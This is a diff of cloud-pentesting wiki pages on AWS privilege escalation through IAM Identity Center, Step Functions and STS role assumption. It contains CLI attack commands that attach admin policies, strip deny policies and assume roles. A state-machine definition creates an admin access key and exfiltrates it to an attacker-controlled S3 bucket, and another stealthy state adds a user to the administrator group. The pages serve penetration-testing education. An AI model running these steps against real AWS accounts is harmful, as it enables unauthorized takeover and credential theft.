+- [8] [Start a session - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-working-with-sessions-start.html)
+- [9] [Install the Session Manager plugin on macOS - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
+- [10] [Monitor Amazon ECS containers with ECS Exec - Amazon Elastic Container Service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-exec.html)
+- [11] [NEW – Using Amazon ECS Exec to access your containers on AWS Fargate and Amazon EC2](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/)
+- [12] [ResumeSession - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_ResumeSession.html)
+- [13] [resume-session - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/resume-session.html)
+- [14] [AWS Systems Manager Parameter Store](https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html)
+- [15] [describe-parameters - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-parameters.html)
+- [16] [get-parameters - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/get-parameters.html)
+- [17] [get-parameter - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/get-parameter.html)
+- [18] [list-commands - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/list-commands.html)
+- [19] [list-command-invocations - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/list-command-invocations.html)
+- [20] [get-command-invocation - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/get-command-invocation.html)
+- [21] [CreateAssociation - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_CreateAssociation.html)
+- [22] [Reference: Cron and rate expressions for Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/reference-cron-and-rate-expressions.html)
+- [23] [UpdateDocument - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_UpdateDocument.html)
+- [24] [update-document-default-version - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/update-document-default-version.html)
+- [25] [list-documents - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/list-documents.html)
+- [26] [get-document - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/get-document.html)
+- [27] [Command document plugin reference - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/documents-command-ssm-plugin-reference.html)
+- [28] [Data elements and parameters - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/documents-syntax-data-elements-parameters.html)
+- [29] [AWS Systems Manager Maintenance Windows](https://docs.aws.amazon.com/systems-manager/latest/userguide/maintenance-windows.html)
+- [30] [register-target-with-maintenance-window - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/register-target-with-maintenance-window.html)
+- [31] [register-task-with-maintenance-window - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/register-task-with-maintenance-window.html)
+- [32] [describe-maintenance-windows - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-maintenance-windows.html)
+- [33] [describe-instances - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-instances.html)
+- [34] [describe-instance-information - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html)
+- [35] [describe-sessions - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-sessions.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - SSO & identitystore Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AWS Identity Center / AWS SSO
 
 For more information about AWS Identity Center / AWS SSO check:
@@ -11,25 +9,25 @@ For more information about AWS Identity Center / AWS SSO check:
 {{#endref}}
 
 > [!WARNING]
-> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
-> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
-> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
+> By **default**, the IAM Identity Center instance is created in the Organizations **Management Account**, and administrators in that account control it.\
+> A member account can manage IAM Identity Center only after it is registered as the **Delegated Administrator**.\
+> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)<sup>[[1]](#references)</sup>
 
-### ~~Reset Password~~
+### `sso-directory:UpdatePassword`
 
-An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.
+With this permission, an attacker can update a password for a user in the built-in IAM Identity Center directory. AWS supports either emailing reset instructions or generating a one-time password to share manually; users sourced from Active Directory or an external identity provider must be reset in that provider. The one-time-password option means access to the target user's mailbox is not inherently required.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### `identitystore:CreateGroupMembership`
 
-With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.
+With this permission, an attacker can add a user to a group. If the group is assigned a permission set, the user receives that group-assigned access.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
-aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>
+aws identitystore create-group-membership --identity-store-id <identity-store-id> --group-id <group-id> --member-id UserId=<user-id>
 ```
 
 ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
+An attacker with these permissions can attach an inline policy to a permission set and provision the updated set to assigned accounts, potentially granting extra permissions to a user under the attacker's control.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 # Set an inline policy with admin privileges
@@ -54,7 +52,7 @@ aws sso-admin provision-permission-set --instance-arn <instance-arn> --permissio
 
 ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
+An attacker with these permissions can attach an AWS managed policy to a permission set and provision the updated set to assigned accounts, potentially granting extra permissions to a user under the attacker's control.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # Set AdministratorAccess policy to the permission set
@@ -66,14 +64,14 @@ aws sso-admin provision-permission-set --instance-arn <instance-arn> --permissio
 
 ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.
+An attacker with these permissions can attach a customer managed policy reference to a permission set and provision the updated set to assigned accounts, potentially granting extra permissions to a user under the attacker's control.<sup>[[5]](#references)[[7]](#references)[[9]](#references)</sup>
 
 > [!WARNING]
-> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected.
+> To use this across all target accounts, you need the **name and path of a customer managed policy that exists in each affected account**.<sup>[[9]](#references)</sup>
 
 ```bash
-# Set AdministratorAccess policy to the permission set
-aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>
+# Attach a customer-managed policy present in each target account
+aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference Name=<customer-managed-policy-name>,Path=/
 
 # Update the provisioning so the new policy is created in the account
 aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
@@ -81,7 +79,7 @@ aws sso-admin provision-permission-set --instance-arn <instance-arn> --permissio
 
 ### `sso:CreateAccountAssignment`
 
-An attacker with this permission could give a Permission Set to a user under his control to an account.
+An attacker with this permission can assign a permission set to a user or group for an AWS account, including a user under the attacker's control.<sup>[[5]](#references)[[10]](#references)</sup>
 
 ```bash
 aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
@@ -89,17 +87,17 @@ aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-i
 
 ### `sso:GetRoleCredentials`
 
-Returns the STS short-term credentials for a given role name that is assigned to the user.
+This operation returns STS short-term credentials for a role assigned to the user and requires an access token issued by the `CreateToken` API.<sup>[[11]](#references)</sup>
 
 ```
 aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>
 ```
 
-However, you need an access token that I'm not sure how to get (TODO).
+However, you need an access token (TODO: document how to obtain one).<sup>[[11]](#references)</sup>
 
 ### `sso:DetachManagedPolicyFromPermissionSet`
 
-An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
+An attacker with this permission can remove the association between an AWS managed policy and the specified permission set. If that policy contains an explicit deny, removing it can grant more privileges.<sup>[[12]](#references)[[17]](#references)</sup>
 
 ```bash
 aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
@@ -107,29 +105,46 @@ aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInsta
 
 ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`
 
-An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
+An attacker with this permission can remove the association between a customer managed policy and the specified permission set. If that policy contains an explicit deny, removing it can grant more privileges.<sup>[[13]](#references)[[17]](#references)</sup>
 
 ```bash
-aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>
+aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <instance-arn> --permission-set-arn <permission-set-arn> --customer-managed-policy-reference Name=<customer-managed-policy-name>,Path=/
 ```
 
 ### `sso:DeleteInlinePolicyFromPermissionSet`
 
-An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**.
+An attacker with this permission can remove the inline policy from the permission set. If that policy contains an explicit deny, removing it can grant more privileges.<sup>[[14]](#references)[[17]](#references)</sup>
 
 ```bash
 aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
 ```
 
-### `sso:DeletePermissionBoundaryFromPermissionSet`
+### `sso:DeletePermissionsBoundaryFromPermissionSet`
 
-An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary.
+An attacker with this permission can remove the permissions boundary from the permission set. Because a permissions boundary intersects with identity-based permissions, removing it can increase the actions a principal can perform.<sup>[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 ```bash
 aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
 ```
 
+## References
+
+- [1] [Delegated administration — AWS IAM Identity Center](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
+- [2] [Actions, resources, and condition keys for AWS IAM Identity Center directory — Service Authorization Reference](https://docs.aws.amazon.com/service-authorization/latest/reference/list_sso-directory.html)
+- [3] [Reset the IAM Identity Center user password for an end user — AWS IAM Identity Center](https://docs.aws.amazon.com/singlesignon/latest/userguide/reset-password-for-user.html)
+- [4] [create-group-membership — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/identitystore/create-group-membership.html)
+- [5] [Assign user or group access to AWS accounts — AWS IAM Identity Center](https://docs.aws.amazon.com/singlesignon/latest/userguide/assignusers.html)
+- [6] [put-inline-policy-to-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/put-inline-policy-to-permission-set.html)
+- [7] [provision-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/provision-permission-set.html)
+- [8] [attach-managed-policy-to-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/attach-managed-policy-to-permission-set.html)
+- [9] [attach-customer-managed-policy-reference-to-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/attach-customer-managed-policy-reference-to-permission-set.html)
+- [10] [create-account-assignment — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/create-account-assignment.html)
+- [11] [get-role-credentials — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso/get-role-credentials.html)
+- [12] [detach-managed-policy-from-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/detach-managed-policy-from-permission-set.html)
+- [13] [detach-customer-managed-policy-reference-from-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/detach-customer-managed-policy-reference-from-permission-set.html)
+- [14] [delete-inline-policy-from-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/delete-inline-policy-from-permission-set.html)
+- [15] [delete-permissions-boundary-from-permission-set — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/delete-permissions-boundary-from-permission-set.html)
+- [16] [DeletePermissionsBoundaryFromPermissionSet — IAM Identity Center](https://docs.aws.amazon.com/singlesignon/latest/APIReference/API_DeletePermissionsBoundaryFromPermissionSet.html)
+- [17] [Policy evaluation logic — AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Step Functions Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Step Functions
 
 For more information about this AWS service, check:
@@ -20,18 +18,18 @@ In order to check all the possible actions, you could go to your own AWS account
 
 Or you could also go to the API AWS documentation and check each action docs:
 
-- [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html)
-- [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)
+- [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html)<sup>[[1]](#references)</sup>
+- [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)<sup>[[2]](#references)</sup>
 
 ### `states:TestState` & `iam:PassRole`
 
-An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, potentially enabling unauthorized access to other AWS services with the roles' permissions. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation.
+An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, potentially enabling unauthorized access to other AWS services with the roles' permissions. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 aws stepfunctions test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]
 ```
 
-The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action:
+The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action:<sup>[[5]](#references)[[9]](#references)</sup>
 
 - **stateDefinition.json**:
 
@@ -69,7 +67,7 @@ aws stepfunctions test-state --definition file://stateDefinition.json --role-arn
 
 ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`)
 
-An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine.
+An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine.<sup>[[6]](#references)[[7]](#references)[[8]](#references)[[13]](#references)</sup>
 
 ```bash
 # Create a state machine
@@ -83,7 +81,7 @@ aws stepfunctions start-execution --state-machine-arn <value> [--name <value>] [
 aws stepfunctions start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
 ```
 
-The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions.
+The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions.<sup>[[5]](#references)[[9]](#references)[[10]](#references)[[11]](#references)[[14]](#references)</sup>
 
 - **stateMachineDefinition.json**:
 
@@ -104,7 +102,7 @@ The following examples show how to create an state machine that creates an acces
     "PrepareS3PutObject": {
       "Type": "Pass",
       "Parameters": {
-        "Body.$": "$.AccessKeyResult.AccessKey",
+        "Body.$": "States.JsonToString($.AccessKeyResult.AccessKey)",
         "Bucket": "attacker-controlled-S3-bucket",
         "Key": "AccessKey.json"
       },
@@ -137,7 +135,7 @@ aws stepfunctions create-state-machine --name MaliciousStateMachine --definition
 
 - **Command** executed to **start an execution** of the previously created state machine:
 
-```json
+```bash
 aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
 {
     "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
@@ -146,28 +144,28 @@ aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:1
 ```
 
 > [!WARNING]
-> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.
+> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.<sup>[[11]](#references)</sup>
 
 **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
 
 ### `states:UpdateStateMachine` & (not always required) `iam:PassRole`
 
-An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.<sup>[[12]](#references)[[13]](#references)</sup>
 
 Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations:
 
-1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough.
-2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition.
+1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough.<sup>[[12]](#references)[[13]](#references)</sup>
+2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition.<sup>[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 aws stepfunctions update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
 [--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
 ```
 
-The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.<sup>[[1]](#references)[[9]](#references)[[10]](#references)</sup>
 
 > [!WARNING]
-> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached).
+> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached).<sup>[[13]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Legit State Machine" }}
@@ -250,8 +248,22 @@ aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-eas
 
 **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
 
+## References
+
+- [1] [AddUserToGroup - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html)
+- [2] [GetSecretValue - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)
+- [3] [test-state — AWS CLI 2.36.5 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/stepfunctions/test-state.html)
+- [4] [Testing state machines with TestState API - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/test-state-isolation.html)
+- [5] [CreateAccessKey - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html)
+- [6] [create-state-machine — AWS CLI 2.36.1 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/stepfunctions/create-state-machine.html)
+- [7] [start-execution — AWS CLI 2.35.22 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/stepfunctions/start-execution.html)
+- [8] [start-sync-execution — AWS CLI 2.35.24 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/stepfunctions/start-sync-execution.html)
+- [9] [Learning to use AWS service SDK integrations in Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/supported-services-awssdk.html)
+- [10] [Passing parameters to a service API in Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/connect-parameters.html)
+- [11] [PutObject - Amazon S3](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html)
+- [12] [update-state-machine — AWS CLI 2.35.22 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/stepfunctions/update-state-machine.html)
+- [13] [Grant a user permissions to pass a role to an AWS service - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [14] [Intrinsic functions for JSONPath states in Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/intrinsic-functions.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc/README.md
@@ -1,14 +1,12 @@
 # AWS - STS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## STS
 
 ### `sts:AssumeRole`
 
-Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**).
+Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**).<sup>[[3]](#references)</sup>
 
-For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role.
+For example, the following role trust policy indicates that all principals can assume it, therefore **any user will be able to privesc** to the permissions associated with that role.<sup>[[2]](#references)</sup>
 
 ```json
 {
@@ -25,24 +23,23 @@ For example, the following role trust policy indicates that anyone can assume it
 }
 ```
 
-You can impersonate a role running:
+You can impersonate a role running:<sup>[[3]](#references)</sup>
 
 ```bash
 aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname
 ```
 
-**Potential Impact:** Privesc to the role.
+**Potential Impact:** Privesc to the role.<sup>[[3]](#references)</sup>
 
 > [!CAUTION]
-> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\
-> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role.
+> For a same-account assumption, the role trust policy can grant access directly to a principal. If it trusts an account rather than an individual principal, the caller's identity policy must also allow `sts:AssumeRole`. To **assume a role from a different account**, the role must trust the caller's account and the caller's account **also needs** to grant the caller **`sts:AssumeRole`** on the role.<sup>[[3]](#references)</sup>
 
 
 ### `sts:AssumeRoleWithSAML`
 
-A trust policy with this role grants **users authenticated via SAML access to impersonate the role.**
+A trust policy with this role grants **users authenticated via SAML access to impersonate the role.**<sup>[[4]](#references)</sup>
 
-An example of a trust policy with this permission is:
+An example of a trust policy with this permission is:<sup>[[4]](#references)</sup>
 
 ```json
 {
@@ -65,25 +62,25 @@ An example of a trust policy with this permission is:
 }
 ```
 
-To generate credentials to impersonate the role in general you could use something like:
+To generate credentials to impersonate the role in general you could use something like:<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 aws sts assume-role-with-saml --role-arn <role_arn> --principal-arn <provider_arn> --saml-assertion <base64_saml_response>
 ```
 
-But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):
+But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):<sup>[[11]](#references)</sup>
 
 ```bash
 onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600
 ```
 
-**Potential Impact:** Privesc to the role.
+**Potential Impact:** Privesc to the role.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### `sts:AssumeRoleWithWebIdentity`
 
-This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
+This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)<sup>[[6]](#references)</sup>
 
-For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like:
+For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like:<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/<role_name> --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
@@ -98,13 +95,13 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
 
 ### IAM Roles Anywhere Privesc
 
-AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
+AWS IAM Roles Anywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.<sup>[[1]](#references)[[8]](#references)</sup>
 
-To understand this attack, it is necessary to explain what a trust anchor is. A trust anchor in AWS IAM Roles Anywhere is the root of trust entity, it contains the public certificate of a Certificate Authority (CA) that is registered in the account so that AWS can validate the presented X.509 certificates. In this way, if the client certificate was issued by that CA and the trust anchor is active, AWS recognizes it as valid.
